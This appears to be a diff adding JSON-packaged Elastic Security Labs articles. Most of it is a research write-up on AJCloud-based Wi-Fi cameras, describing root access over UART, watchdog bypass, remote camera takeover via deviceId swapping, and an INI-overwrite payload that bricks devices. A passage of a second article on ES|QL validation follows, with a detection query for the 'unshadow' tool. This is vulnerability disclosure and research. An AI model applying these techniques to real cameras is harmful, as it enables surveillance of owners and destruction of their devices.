+ "document": "---\ntitle: \"Storm on the Horizon: Inside the AJCloud IoT Ecosystem\"\nslug: \"storm-on-the-horizon\"\ndate: \"2024-09-20\"\ndescription: \"Wi-Fi cameras are popular due to their affordability and convenience but often have security vulnerabilities that can be exploited.\"\nauthor:\n - slug: mark-mager\n - slug: eric-forte\nimage: \"storm-on-the-horizon.jpg\"\ncategory:\n - slug: security-research\n - slug: perspectives\ntags:\n - iot\n - defcon\n---\n\n## Introduction\n\nWi-Fi cameras are some of the most common IoT devices found in households, businesses, and other public spaces. They tend to be quite affordable and provide users with easy access to a live video stream on their mobile device from anywhere on the planet. As is often the case with IoT devices, security tends to be overlooked in these cameras, leaving them open to critical vulnerabilities. If exploited, these vulnerabilities can lead to devastating effects on the cameras and the networks within which they’re deployed. They can lead to the compromise of the sensitive PII of their users.\n\nA recent [Elastic ON Week](https://www.youtube.com/watch?v=qoojLdKJvkc) afforded us the opportunity to explore the attack surface of these types of devices to gain a deeper understanding of how they are being compromised. We focused primarily on performing vulnerability research on the [Wansview Q5](https://www.amazon.com/Wireless-Security-Wansview-Detection-Compatible/dp/B07QKXM2D3?th=1) (along with the nearly identical [Q6](https://www.wansview.com/q6)), one of the more popular and affordable cameras sold on Amazon. Wansview is a provider of security products based in Shenzhen, China, and one of Amazon's more prominent distributors of Wi-Fi cameras.\n\n\n\nThe Q5 offers the same basic feature set seen in most cameras:\n\n* Pan / tilt / zoom\n* Night vision\n* Two-way audio\n* Video recording to SD card\n* Integration with Smart Home AI assistants (e.g. 
Alexa)\n* ONVIF for interoperability with other security products\n* RTSP for direct access to video feed within LAN\n* Automated firmware updates from the cloud\n* Remote technical support\n* Shared device access with other accounts\n* Optional monthly subscription for cloud storage and motion detection\n\nLike most other Wi-Fi cameras, these models require an active connection to their vendor cloud infrastructure for basic operation; without access to the Internet, they simply will not operate. Before a camera can go live, it must be paired to a [registered user account](https://www.youtube.com/watch?v=UiF7xKnXfC0) via Wansview’s official mobile app and a standard [QR code-based setup process](https://youtu.be/PLMNKoO1214?si=G8sYxT3EagE3u_cw). Once this process is complete, the camera will be fully online and operational.\n\n## AJCloud: A Brief Introduction\n\nThough Wansview has been in operation [since 2009](https://www.wansview.com/about_company), at the moment they primarily appear to be a reseller of camera products built by a separate company based in Nanjing, China: [AJCloud](https://www.ajcloud.net).\n\n\n\nAJCloud provides vendors with access to manufactured security devices, the necessary firmware, mobile and desktop user applications, the cloud management platform, and services that connect everything together. 
Since AJCloud was founded in 2018, they have partnered with several vendors, both large and small, including but not limited to the following:\n\n* [Wansview](https://www.wansview.com)\n* [Cinnado](https://cinnado.com)\n* [Galayou](https://www.amazon.com/stores/GALAYOU/page/789538ED-82AC-43AF-B676-6622577A1982?ref_=ast_bln&store_ref=bl_ast_dp_brandLogo_sto)\n* [Faleemi](https://www.faleemi.com)\n* [Philips](https://www.philips.com)\n* [Septekon](https://www.septekon.com)\n* [Smarteye](https://www.smarteyegroup.com)\n* [Homeguard](http://www.homeguardworld.com)\n* [iPupPee](https://ipuppee.com)\n\nA cursory review of mobile and desktop applications developed and published by AJCloud on [Google Play](https://play.google.com/store/apps/developer?id=AJCLOUD+INTERNATIONAL+INC.&hl=en_US), [Apple’s App Store](https://apps.apple.com/us/developer/ajcloud-labs-inc/id1396464400), and the [Microsoft Store](https://apps.microsoft.com/search/publisher?name=%E5%8D%97%E4%BA%AC%E5%AE%89%E5%B1%85%E4%BA%91%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&hl=en-us&gl=US) reveals their ties to each of these vendors. Besides superficial company branding, these applications are identical in form and function, and they all require connectivity with the AJCloud management platform.\n\n\n\nAs for the cameras, it is apparent that these vendors are selling similar models with only minor modifications to the camera housing and underlying hardware.\n\n\n\n\n\nThe resemblance between the [Faleemi 886](https://www.faleemi.com/product/fsc886/) and the [Wansview Q6 (1080p)](https://www.youtube.com/watch?v=X5P5fGhRxAs) is obvious\n\nReusing hardware manufacturing and software development resources likely helps to control costs and simplify logistics for AJCloud and its resellers. 
However, this streamlining of assets also means that security vulnerabilities discovered in one camera model would likely permeate all products associated with AJCloud.\n\nDespite its critical role in bringing these devices to consumers, AJCloud has a relatively low public profile. However, IPVM researchers recently [published](https://ipvm.com/reports/ajcloud-wansview-leak) research on a significant vulnerability (which has since been resolved) in AJCloud’s GitLab repository. This vulnerability would allow any user to access source code, credentials, certificates, and other sensitive data without requiring authentication.\n\nThough total sales figures are difficult to derive for Wansview and other vendors in the Wi-Fi camera space, IPVM estimated that at least one million devices were connected to the AJCloud platform at the time of publication of their report. As camera sales [continue to soar](https://www.statista.com/forecasts/1301193/worldwide-smart-security-camera-homes) into the hundreds of millions, it is safe to assume that more of AJCloud’s devices will be connected in homes across the world for years to come.\n\n## Initial Vulnerability Research Efforts\n\nTo gain a deeper understanding of the security posture of the Wansview Q5, we attacked it from multiple angles:\n\n\n\nAt first, our efforts were primarily focused on active and passive network reconnaissance of the camera and the [Android version](https://play.google.com/store/apps/details?id=net.ajcloud.wansviewplus&hl=en_US) of Wansview Cloud, Wansview’s official mobile app. We scanned for open ports, eavesdropped on network communications through man-in-the-middle (MitM) attacks, attempted to coerce unpredictable behavior from the cameras through intentional misconfiguration in the app, and disrupted the operation of the cameras by abusing the QR code format and physically interacting with the camera. 
The devices and their infrastructure were surprisingly resilient to these types of surface-level attacks, and our initial efforts yielded few noteworthy successes.\n\nWe were particularly surprised by our lack of success intercepting network communications on both the camera and the app. We repeatedly encountered robust security features (e.g., certificate pinning, app and OS version restrictions, and properly secured TLS connections) that disrupted our attempts.\n\n\n\nReverse engineering tools allowed us to analyze the APK much more closely, though the complexity of the code obfuscation observed within the decompiled Java source code would have required an extended length of time to fully piece together.\n\nOur limited initial success pushed us to explore further options that could provide more nuanced insight into the Q5 and how it operates.\n\n## Initial Hardware Hacking\n\nTo gain more insight into how the camera functioned, we decided to take a closer look at the camera firmware. While some firmware packages are available online, we wanted to examine the code directly and be able to monitor it and the resulting logs while the camera was running. To do this, we first reviewed the hardware diagram for the system on a chip (SoC) to see if there were any hardware avenues we might be able to leverage. The Wansview Q5 uses an [Ingenic Xburst T31 SoC](https://www.cnx-software.com/2020/04/26/ingenic-t31-ai-video-processor-combines-xburst-1-mips-and-risc-v-lite-cores/); its system block diagram is depicted below.\n\n\n\nOne avenue that stood out to us was the I2Cx3/UARTx2/SPIx2 SPI I/O block. If accessible, these I/O blocks often provide log output and/or shell interfaces, which can be used for debugging and interacting with the SoC. 
As this appeared promising, we performed a hardware teardown of the camera and found what looked like a UART serial interface to the SoC, shown below.\n\n\n\nNext, we connected a logic analyzer to see what protocol was being used over these pins; when decoded, the signal was indeed UART.\n\n\n\nWith access to the exposed UART interface, we then looked to establish a shell connection to the SoC. There are a number of different software mechanisms to do this, but for our purposes we used the Unix utility `screen` with the baud rate detected by the logic analyzer. \n\n\n\nUpon opening the connection and monitoring the boot sequence, we discovered that secure boot was not enabled despite being supported by the SoC. We then modified the configuration to boot into single-user mode, providing a root shell we could use to examine the firmware before the initialization processes were performed, shown below. \n\n\n\nOnce in single-user mode, we were able to pull the firmware files for static analysis using the `binwalk` utility, as shown below. \n\n\n\nAt this stage, the filesystem is generally read-only; however, we wanted to be able to make edits and instantiate only specific parts of the firmware initialization as needed, so we set up additional persistence beyond single-user mode access. This can be done in a number of ways, but there are two primary methods one may wish to use. Generally speaking, in both approaches, one will want to make as few modifications to the existing configuration as possible; this is preferred when running dynamic analysis, as it minimizes the impact on the runtime environment. One method we used was to create a `tmpfs` partition for read/write access in memory and mount it via `fstab`. In our case, `fstab` was already configured in a way that supported this, making it a very minimal change. 
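A minimal `fstab` entry of that shape might look like the following (the mount point and size here are illustrative, not the camera's actual configuration):

```
# mount a small in-memory tmpfs to get scratch read/write space
# on an otherwise read-only filesystem
tmpfs  /mnt/rw  tmpfs  defaults,size=8m  0  0
```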
See the commands and results for this approach below.\n\n\n\nAnother method is to pull existing user credentials and attempt to use them to log in. This approach was also successful. The password hash for the root user can be found in the `/etc/passwd` file and cracked using a tool like John the Ripper. In the above examples, we were transferring data and files entirely over the serial connection. The camera also has an available SD card slot that can be mounted and used to transfer files. Going forward, we will be using the SD card or local network for moving files, as the bandwidth makes for faster and easier transfers; however, serial can still be used for all communications during hardware setup and debugging if preferred.\n\nWe now have root-level access to the camera, providing access to the firmware and dmesg logs while the software is running. Using both the firmware and logs as reference, we then looked to further examine the user interfaces for the camera to see if there was a good entry point we could use to gain further insight.\n\n## Wansview Cloud for Windows\n\nAfter the mobile apps proved to be more secure than we had originally anticipated, we shifted our focus to an older version of the Wansview Cloud application built for Windows 7. This app, which is still [available for download](https://www.wansview.com/support_download), would provide us with direct insight into the network communications involved with cameras connected to the AJCloud platform.\n\nThanks in large part to overindulgent debug logging on behalf of the developers, the Windows app spills out its secrets with a reckless abandon seldom seen in commercial software. The first sign that things are amiss is that user login credentials are logged in cleartext.\n\n\n\nReverse engineering the main executable and DLLs (which are not packed, unlike the Wansview Cloud APK) was expedited thanks to the frequent use of verbose log messages containing unique strings. 
Identifying references to specific files and lines within its underlying codebase helped us to quickly map out core components of the application and establish the high-level control flow.\n\nNetwork communications, which were difficult for us to intercept on Android, are still transmitted over TLS, though they are conveniently logged to disk in cleartext. With full access to all HTTP POST request and response data (which is packed into JSON objects), there was no further need to pursue MitM attacks on the application side. \n\n\n\n\n\nWithin the POST responses, we found sensitive metadata, including links to publicly accessible screen captures along with information about the camera’s location, network configuration, and firmware version.\n\n\n\n\n\nAfter documenting all POST requests and responses found within the log data, we began to experiment with manipulating different fields in each request in an attempt to access data not associated with our camera or account. We eventually used a debugger to change the deviceId to that of a target camera not paired with the currently logged-in account. A camera deviceId doubles as its serial number and can be found printed on a sticker label located on either the back or bottom of a camera.\n\n\n\nWe found the most appropriate target for our attack in a code section where the deviceId is first transmitted in a POST request to [https://sdc-us.ajcloud.net/api/v1/dev-config](https://sdc-us.ajcloud.net/api/v1/dev-config):\n\n\n\nOur plan was to set a breakpoint at the instruction highlighted in the screenshot above, swap out the deviceId within memory, and then allow the app to resume execution.\n\nAmazingly enough, this naive approach not only retrieved sensitive data stored in the AJCloud platform associated with the target camera and the account it is tied to, but it also connected us to the camera itself. 
This allowed us to access its video and audio streams and remotely control it through the app as if it were our own camera.\n\nBy exploiting this vulnerability and testing against multiple models from various vendors, we determined that all devices connected to the AJCloud platform could be remotely accessed and controlled in this manner. We wrote a [PoC exploit script](https://github.com/elastic/camera-hacks/blob/main/windows/win_exploit.py) to automate this process and effectively demonstrate how trivially this access control vulnerability within AJCloud’s infrastructure can be exploited.\n\n## Exploring the network communications\n\nThough we were able to build and reliably trigger an exploit against a critical vulnerability in the AJCloud platform, we would need to dig further in order to gain a better understanding of the inner workings of the apps, the camera firmware, and the cloud infrastructure.\n\nAs we explored beyond the POST requests and responses observed throughout the sign-in process, we noticed a plethora of UDP requests and responses from a wide assortment of IPs. Little in the way of discernible plaintext data could be found throughout these communications, and the target UDP port numbers for the outbound requests seemed to vary. Further investigation would later reveal that this UDP activity was indicative of PPPP, an IoT peer-to-peer (P2P) protocol that was analyzed and demonstrated extensively by Paul Marrapese during his [presentation at DEF CON 28](https://youtu.be/Z_gKEF76oMM?si=cqCBU6iPxCyEm-xm). We would later conclude that the way in which we exploited the vulnerability we discovered was facilitated through modified P2P requests, which led us to further explore the critical role that P2P plays in the AJCloud platform.\n\n\n\nThe main purpose of P2P is to facilitate communication between applications and IoT devices, regardless of the network configurations involved. 
P2P primarily utilizes an approach based around [UDP hole punching](https://en.wikipedia.org/wiki/UDP_hole_punching) to create temporary communication pathways that allow requests to reach their target either directly or through a relay server located in a more accessible network environment. The core set of P2P commands integrated into AJCloud’s apps provides access to video and audio streams as well as the microphone and pan/tilt/zoom.\n\n## Advanced Hardware Hacking\n\nWith our additional understanding of the P2P communications, it was now time to examine the camera itself more closely during these P2P conversations, including running the camera software in a debugger. To start, we set up the camera with a live logging output via the UART serial connection that we established earlier, shown below.\n\n\n\nThis provided a live look at the log messages from the applications as well as any additional logging sources we needed. From this information, we identified the primary binary that is used to establish communication between the camera and the cloud as well as providing the interfaces to access the camera via P2P. \n\nThis binary is locally called initApp, and it runs once the camera has been fully initialized and the boot sequence is completed. Given this, we set out to run this binary with a debugger to better evaluate the local functions. In attempting to do so, we encountered a kernel watchdog that detected when initApp was not running and would forcibly restart the camera if it detected a problem. This watchdog checks for writes to `/dev/watchdog` and, if these writes cease, will trigger a timer that will reboot the camera if the writes do not resume. This makes debugging more difficult as when one pauses the execution of initApp, the writes to the watchdog pause as well. An example of this stopping behavior is shown below:\n\n\n\nTo avoid this, one could simply try writing to the watchdog whenever initApp stops to prevent the reboot. 
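That naive keep-alive approach could be sketched in a few lines of Python (a hypothetical sketch, not the tooling we used; the device path comes from the watchdog behavior described above, and the feed interval is an assumption):

```python
import os
import time

def feed_once(fd):
    # A single keep-alive write; any byte written resets the watchdog timer.
    os.write(fd, b'\x00')

def keep_alive(path='/dev/watchdog', interval=1.0, should_stop=lambda: False):
    # Feed the watchdog periodically so the camera is not rebooted
    # while initApp is paused in the debugger.
    fd = os.open(path, os.O_WRONLY)
    try:
        while not should_stop():
            feed_once(fd)
            time.sleep(interval)
    finally:
        os.close(fd)
```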
However, another, cleaner option is to make use of the magic close feature of the [Linux Kernel Watchdog Driver API](https://www.kernel.org/doc/Documentation/watchdog/watchdog-api.txt). In short, if one writes the magic character ‘V’ to `/dev/watchdog`, the watchdog will be disabled. There are other methods of defeating the watchdog as well, but this was the one we chose for our research, as it makes it easy to enable and disable the watchdog at will.\n\nWith the watchdog disabled, setting up to debug initApp is fairly straightforward. We wanted to run the code directly on the camera, if possible, instead of using an emulator. The architecture of the camera is little-endian MIPS (MIPSEL). We were fortunate that pre-built GDB and GDBServer binaries were able to function without modification; however, we did not know this initially, so we also set up a toolchain to compile GDBServer specifically for the camera. One technique that might be useful if you find yourself in a similar situation is to use a compiler like gcc to build some source code for your suspected target architecture and see if it runs; see the example below.\n\n\n\nIn our case, since the SoC was known to us, we were fairly certain of the target architecture; however, in certain situations, this may not be so simple to discover, and working from hello-world binaries can be useful to establish an initial understanding. Once we were able to compile binaries, we compiled GDBServer for our camera and used it to attach to and launch initApp. Then, we connected to it from another computer on the same local network as the camera. An example of this is shown below:\n\n\n\nAs a note for the above example, we are using the `-x` parameter to pass in some commands for convenience, but they are not necessary for debugging. For more information on any of the files or commands, please see our [elastic/camera-hacks](https://github.com/elastic/camera-hacks/tree/main) GitHub repo. 
In order for initApp to load properly, we also needed to ensure that the libraries used by the binary were accessible via the `PATH` and `LD_LIBRARY_PATH` environment variables. With this setup, we were then able to debug the binary as needed. Since we used the magic-character method of defeating the watchdog earlier, we also needed to control instances where the watchdog could be re-enabled; in most cases, we did not want this to happen. As such, we overwrote the watchdog calls in initApp so that the watchdog would not be re-enabled while we were debugging, as shown below.\n\n\n\nThe following video shows the full setup process from boot to running GDBServer. In the video, we also start a new initApp process, and as such, we need to kill both the original process and the `daemon.sh` shell script that will spawn a new initApp process if it is killed.\n\n\n\n## Building a P2P Client\n\nIn order to further explore the full extent of the capabilities that P2P provides to AJCloud IoT devices and how they can be abused by attackers, we set out to build our own standalone client. This approach would remove the overhead of manipulating the Wansview Cloud Windows app while allowing us to more rapidly connect to cameras and test out commands we derived from reverse engineering the firmware.\n\nFrom the configuration data we obtained earlier from the Windows app logs, we knew that a client issues requests to up to three different servers as part of the connection process. These servers provide instructions to clients as to where traffic should be routed in order to access a given camera. If you would like to discover more of these servers out in the open, you can scan the Internet using the following four-byte UDP payload on port `60722`. 
Paul Marrapese used this technique to great effect as part of his research.\n\n\n\n\n\nIn order to properly establish a P2P connection, a client must first send a simple hello message (`MSG_HELLO`), which needs to be ACK’d (`MSG_HELLO_ACK`) by a peer-to-peer server. The client then queries the server (`MSG_P2P_REQ`) for a particular deviceId. If the server is aware of that device, then it will respond (`MSG_PUNCH_TO`) to the client with a target IP address and UDP port number pair. The client will then attempt to connect (`MSG_PUNCH_PKT`) to the IP and port pair along with other ports [within a predetermined range](https://github.com/elastic/camera-hacks/blob/deb2abe9a7a1009c5c1b7d34584f143d5b62c82e/p2p/p2p_client.py#L247-L260) as part of a [UDP hole punching](https://en.wikipedia.org/wiki/UDP_hole_punching) routine. If successful, the target will send a message (`MSG_PUNCH_PKT`) back to the client along with a final message (`MSG_P2P_RDY`) to confirm that the connection has been established.\n\n\n\nAfter connecting to a camera, we are primarily interested in sending different `MSG_DRW` packets and observing their behavior. These packets contain commands which will allow us to physically manipulate the camera, view and listen to its video and audio streams, access data stored within it, or alter its configuration. 
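The client side of the connection sequence described above can be sketched as a minimal UDP program. Note that the opcodes, magic byte, and framing below are placeholders chosen for illustration; the actual PPPP wire format is not reproduced here:

```python
import socket
import struct

# Placeholder constants: purely illustrative, not the real protocol values.
MAGIC = 0xAB
MSG_HELLO = 0x00
MSG_P2P_REQ = 0x01

def build_msg(opcode, payload=b''):
    # Frame a message as [magic][opcode][big-endian length][payload].
    return struct.pack('>BBH', MAGIC, opcode, len(payload)) + payload

def handshake(server_ip, server_port, device_id, timeout=2.0):
    # MSG_HELLO -> MSG_HELLO_ACK, then MSG_P2P_REQ for a deviceId ->
    # MSG_PUNCH_TO carrying the IP:port pair to hole-punch against.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_msg(MSG_HELLO), (server_ip, server_port))
    ack, _ = sock.recvfrom(1024)          # expect MSG_HELLO_ACK
    sock.sendto(build_msg(MSG_P2P_REQ, device_id.encode()), (server_ip, server_port))
    punch_to, _ = sock.recvfrom(1024)     # expect MSG_PUNCH_TO (target IP and port)
    return punch_to
```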
The most straightforward command we started with involved panning the camera counterclockwise, which we could easily identify as a single message transmission.\n\n\n\nDebug log messages on the camera allowed us to easily locate where this command was processed within the firmware.\n\n\n\nLocating the source of this particular message placed us in the main routine that handles processing MSG_DRW messages, which provided us with critical insight into how this command is invoked and what other commands are supported by the firmware.\n\n\n\nExtensive reverse engineering and testing allowed us to build a [PoC P2P client](https://github.com/elastic/camera-hacks/blob/main/p2p/p2p_client.py) that allows users to connect to any camera on the AJCloud platform, provided they have access to its deviceId. Basic commands supported by the client include camera panning and tilting, rebooting, resetting, playing audio clips, and even crashing the firmware.\n\nThe most dangerous capability we were able to implement was through a command that modifies a core device configuration file: `/var/syscfg/config_default/app_ajy_sn.ini`. On our test camera, the file’s contents were originally as follows:\n\n```\n[common]\nproduct_name=Q5\nmodel=NAV\nvendor=WVC\nserialnum=WVCD7HUJWJNXEKXF\nmacaddress=\nwifimacaddress=\n```\n\nWhile this appears to contain basic device metadata, this file is the only means through which the camera knows how to identify itself. Upon startup, the camera reads in the contents of this file and then attempts to connect to the AJCloud platform through a series of curl requests to various API endpoints. These curl requests pass along the product name, camera model, vendor code, and serial number values extracted from the INI file as query string arguments. 
We used our client to deliver a message which overwrites the contents like so:\n\n```\n[common]\nproduct_name=\nmodel=OPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~HH01\nvendor=YZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~HH01\nserialnum=defghijklmnopqrstuvwxyz{|}~HH01\nmacaddress=\nwifimacaddress=\n```\n\nAfter the camera is reset, all curl requests issued to AJCloud platform API endpoints as part of the startup routine will fail due to the malformed data contained within the INI file. These requests will continue to periodically be sent, but they will never succeed and the camera will remain inactive and inaccessible through any apps. Unfortunately, there is no simple way to restore the previous file contents through resetting the camera, updating its firmware, or restoring the factory settings. File modifications carried out through this command will effectively brick a camera and render it useless.\n\n\n\nTaking a closer look at the decompiled function (`syscfg_setAjySnParams`) which overwrites the values stored in `app_ajy_sn.ini`, we can see that input parameters, extracted from the `MSG_DRW` command are used to pass along string data which will be used to overwrite the model, vendor, and serial number fields in the file. memset is used to overwrite three global variables, intended to store these input strings, with null bytes. strcpy is then used to transfer the input parameters into these globals. In each instance, this will result in bytes being copied directly from the `MSG_DRW` command buffer until it encounters a null character.\n\n\n\nBecause no validation is enforced on the length of these input parameters extracted from the command, it is trivial to craft a message of sufficient length which will trigger a buffer overflow. 
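The unchecked-copy pattern can be modeled in a few lines (the 32-byte destination size below is hypothetical; we did not determine the actual sizes of the firmware's globals):

```python
def unchecked_copy(dest_size, field):
    # Model of the strcpy pattern: bytes are copied until a NUL byte
    # is reached, with no regard for the destination buffer size.
    copied = field.split(b'\x00')[0]
    overflow = max(0, len(copied) - dest_size)
    return overflow

# A serial number field far longer than a (hypothetical) 32-byte global
# spills 32 bytes past the end of the buffer:
spill = unchecked_copy(32, b'A' * 64 + b'\x00')
```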
While we did not leverage this vulnerability as part of our attack to brick the camera, this appears to be an instance where an exploit could be developed which would allow an attacker to achieve remote code execution on the camera.\n\n## Impact\n\nWe have confirmed that a broad range of devices across several vendors affiliated with AJCloud and several different firmware versions are affected by these vulnerabilities and flaws. Overall, we successfully demonstrated our attacks against fifteen different camera products from Wansview, Galayou, Cinnado, and Faleemi. Based on our findings, it is safe to assume that all devices which operate AJCloud firmware and connect to the AJCloud platform are affected.\n\nAll attempts to contact both AJCloud and Wansview in order to disclose these vulnerabilities and flaws were unsuccessful.\n\n## What did the vendors do right?\n\nDespite the vulnerabilities we discovered and discussed previously, there are a number of security controls that AJCloud and the camera vendors implemented well. For such a low-cost device, many best practices were implemented. First, the network communications are secured well using certificate-based WebSocket authentication. In addition to adding encryption, putting many of the API endpoints behind the certificate auth makes man-in-the-middle attacks significantly more challenging. Furthermore, the APKs for the mobile apps were signed and obfuscated, making manipulating these apps very time-consuming. \n\nAdditionally, the vendors also made some sound decisions with the camera hardware and firmware. The local OS for the camera is effectively limited, focusing on just the needed functionality for their product. The file system is configured to be read-only, outside of logging, and the kernel watchdog is an effective method of ensuring uptime and reducing the risk of being stuck in a failed state. 
The Ingenic Xburst T31 SoC provides a capable platform with a wide range of support including secure boot, a Power-On Reset (POR) watchdog, and a separate RISC-V processor capable of running some rudimentary machine learning on the camera input.\n\n## What did the vendors do wrong?\n\nUnfortunately, there were a number of missed opportunities with these available features. Potentially the most egregious is the unauthenticated cloud access. Given the API access controls established for many of the endpoints, having the camera user access endpoints available via serial number without authentication is a huge and avoidable misstep. The P2P protocol is also vulnerable, as we showcased, but compared to the API access issue, which should be immediately fixable, the protocol may take more time to fix. It is a very dangerous vulnerability, but it is a little more understandable, as it requires considerably more time investment to both discover and fix. \n\nFrom the application side, the primary issue is with the Windows app, which has extensive debug logging that should have been removed before releasing publicly. As for the hardware, it can be easily manipulated with physical access (exposed reset button, etc.). This is not so much an issue given the target consumer audience. It is expected to err on the side of usability rather than security, especially given physical access to the device. On a similar note, secure boot should be enabled, especially given that the T31 SoC supports it. While not strictly necessary, this would make it much harder to debug the source code and firmware of the device directly, making it more difficult to discover vulnerabilities that may be present. Ideally it would be implemented in such a way that the bootloader could still load an unsigned OS to allow for easier tinkering and development, but would prevent the signed OS from loading until the bootloader configuration is restored. 
However, one significant flaw in the current firmware is its dependence on the original serial number, which is not stored in a read-only mount point while the system is running. Manipulating the serial number should not permanently brick the device. The device should either have a mechanism for requesting a new serial number (or restoring its original serial number) should its serial number be overwritten, or the serial number should be immutable. \n\n## Mitigations\n\nCertain steps can be taken to reduce the attack surface and limit potential adverse effects in the event of an attack, though they vary in their effectiveness.\n\nSegmenting Wi-Fi cameras and other IoT devices off from the rest of your network is a highly recommended countermeasure which will prevent attackers from pivoting laterally to more critical systems. However, this approach does not prevent an attacker from obtaining sensitive user data through exploiting the access control vulnerability we discovered in the AJCloud platform. Also, considering the ease with which we were able to demonstrate how cameras could be accessed and manipulated remotely via P2P, any device connected to the AJCloud platform is still at significant risk of compromise regardless of its local network configuration.\n\nRestricting all network communications to and from these cameras would not be feasible due to how essential connectivity to the AJCloud platform is to their operation. As previously mentioned, the devices will simply not operate if they are unable to connect to various API endpoints upon startup.\n\nA viable approach could be restricting communications beyond the initial startup routine. However, this would prevent remote access and control via mobile and desktop apps, which would defeat the entire purpose of these cameras in the first place. 
For further research in this area, please refer to “[Blocking Without Breaking: Identification and Mitigation of Non-Essential IoT Traffic](https://petsymposium.org/popets/2021/popets-2021-0075.pdf)”, which explored this approach more in-depth across a myriad of IoT devices and vendors.\n\nThe best approach to securing any Wi-Fi camera, regardless of vendor, while maintaining core functionality would be to flash it with alternative open source firmware such as [OpenIPC](https://openipc.org) or [thingino](https://thingino.com). Switching to open source firmware avoids the headaches associated with forced connectivity to vendor cloud platforms by providing users with fine-grained control of device configuration and remote network accessibility. Open access to the firmware source helps to ensure that critical flaws and vulnerabilities are quickly identified and patched by diligent project contributors.\n\n## Key Takeaways\n\nOur research revealed several critical vulnerabilities that span all aspects of cameras operating AJCloud firmware which are connected to their platform. Significant flaws in access control management on their platform and in the PPPP peer-to-peer protocol provide an expansive attack surface which affects millions of active devices across the world. Exploiting these flaws and vulnerabilities leads to the exposure of sensitive user data and provides attackers with full remote control of any camera connected to the AJCloud platform. Furthermore, a built-in P2P command, which intentionally provides arbitrary write access to a key configuration file, can be leveraged to either permanently disable cameras or facilitate remote code execution through triggering a buffer overflow.\n\nPlease visit our [GitHub repository](https://github.com/elastic/camera-hacks) for custom tools and scripts we have built, along with data and notes we have captured, which we felt would provide the most benefit to the security research community.\n"
+ },
+ "title": "Storm on the Horizon: Inside the AJCloud IoT Ecosystem",
+ "slug": "storm-on-the-horizon",
+ "date": "2024-09-20",
+ "description": "Wi-Fi cameras are popular due to their affordability and convenience but often have security vulnerabilities that can be exploited.",
+ "author": [
+ {
+ "slug": "mark-mager"
+ },
+ {
+ "slug": "eric-forte"
+ }
+ ],
+ "image": "storm-on-the-horizon.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "perspectives"
+ }
+ ],
+ "tags": [
+ "iot",
+ "defcon"
+ ]
+ },
+ "id": "security_labs_content-storm_on_the_horizon-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_esql_query_and_rule_validation-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_esql_query_and_rule_validation-md.json
new file mode 100644
index 00000000000..c97ff806068
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-streamlining_esql_query_and_rule_validation-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Streamlining ES|QL Query and Rule Validation: Integrating with GitHub CI\"\nslug: \"streamlining-esql-query-and-rule-validation\"\ndate: \"2023-11-17\"\ndescription: \"ES|QL is Elastic's new piped query language. Taking full advantage of this new feature, Elastic Security Labs walks through how to run validation of ES|QL rules for the Detection Engine.\"\nauthor:\n - slug: mika-ayenson\n - slug: eric-forte\nimage: \"photo-edited-01.png\"\ncategory:\n - slug: security-research\n---\n\nOne of the amazing, recently premiered [8.11.0 features](https://www.elastic.co/guide/en/elasticsearch/reference/current/release-highlights.html) is the Elasticsearch Query Language ([ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html)). As highlighted in an earlier [post by Costin Leau](https://www.elastic.co/blog/elasticsearch-query-language-esql), it’s a full-blown, specialized query and compute engine for Elasticsearch. Now that it’s in technical preview, we wanted to share some options to _validate_ your ES|QL queries. This overview is for engineers new to ES|QL. Whether you’re searching for insights in Kibana or investigating security threats in [Timelines](https://www.elastic.co/guide/en/security/current/timelines-ui.html), you’ll see how this capability is seamlessly interwoven throughout Elastic. \n\n## ES|QL validation basics ft. Kibana & Elasticsearch\n\nIf you want to quickly validate a single query, or feel comfortable manually testing queries one-by-one, the Elastic Stack UI is all you need. After navigating to the Discover tab in Kibana, click on the \"**Try ES|QL**\" Technical Preview button in the Data View dropdown to load the query pane. You can also grab sample queries from the [ES|QL Examples](https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-examples.html) to get up and running. 
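For instance, the rule query revisited later in this post can be pasted into the pane as a starting point:

```
from logs-endpoint.events.*
| keep host.os.type, process.name, process.working_directory, event.type, event.action
| where host.os.type == "linux" and process.name == "unshadow" and event.type == "start" and event.action in ("exec", "exec_event")
```

Deliberately mistyping the `where` keyword or a field name is an easy way to see the editor's validation feedback in action.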
Introducing non-[ECS](https://www.elastic.co/guide/en/ecs/current/index.html) fields will immediately highlight errors, prioritizing syntax errors, then unknown column errors. \n\n\n\nIn this example, there are two errors that are highlighted: \n* the invalid syntax error on the input `wheres`, which should be `where`, and \n* the unknown column `process.worsking_directory`, which should be `process.working_directory`. \n\n\n\nAfter resolving the syntax error in this example, you’ll observe the unknown column errors. Here are a couple of reasons this error may appear: \n\n - **Fix Field Name Typos**: Sometimes you simply need to fix the name as suggested in the error; consult the ECS or any integration schemas and confirm the fields are correct\n - **Add Missing Data**: If you’re confident the fields are correct, adding data to your stack will sometimes populate the columns\n - **Update Mapping**: You can configure [Mappings](https://www.elastic.co/guide/en/elasticsearch/reference/8.11/mapping.html) to set explicit fields, or add new fields to an existing data stream or index using the [Update Mapping API](https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-put-mapping.html) \n\n## ES|QL warnings\n\nNot all fields will appear as errors, in which case you’re presented with warnings and a dropdown list. Hard failures (e.g. errors) imply that the rule cannot execute, whereas warnings indicate that the rule can run, but the functions may be degraded. \n\n\n\nWhen utilizing broad ES|QL queries that span multiple indices, such as `logs-* | limit 10`, there might be instances where certain fields fail to appear in the results. This is often due to the fields being undefined in the indexed data, or not yet supported by ES|QL. In cases where the expected fields are not retrieved, it's typically a sign that the data was ingested into Elasticsearch without these fields being indexed, as per the established mappings. 
